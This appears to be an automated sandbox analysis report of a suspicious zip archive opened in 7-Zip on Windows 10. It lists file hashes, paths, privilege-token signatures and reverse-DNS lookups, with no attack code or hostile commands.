SHA1 c17d72868beb9c4fc23c040f28905d45f427a90d
SHA256 aa1d2fb39f828a2b4c47de7033ae106465073d6898dfa60cf069ca061369058b
SHA512 037aa3a013fb1e6e02a0b7e3b650315b23c5282f0af95df194597972e159333c223f7499b8bb6f7a196c85761d1a72a9805e061b7ef37fe59b4adf3e727040a3

C:\Windows\Resources\Themes\icsys.icn

MD5 d7dcb623cb522d25402a2e8782878d73
SHA1 b95d050300fec2c03168d07d81cd8bde5e2ff896
SHA256 ea6de8ae4370be0963b47eab8dce40d96c2d724f640f5d8335ec903187cb9c9f
SHA512 27a67e352c272a0b1d275cf17a9c62d6f13b1a2349f041551300885021ac3e2d216184c5b08ff0f9f9f782643de7816bccc3142c21e2daf688fda610a02af24e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c6e82bb25ce0828aaf86f2b3882029c0
SHA1 580e19cc169fd778a957b4189c461109cf2c1556
SHA256 a32842e0dc01050c33328d718d2bea3f51535ed89e1ad64196e46fbed6a06fe9
SHA512 ac7333f9d4a5e8db01e2b82f3bed15dfb79d7b490b5d42cf0fdc9d523161ef7d634817d7583d43d5d271f93e6bfbec45b3add4dd48250035583ca7e2b8f1628b

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

277s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

N/A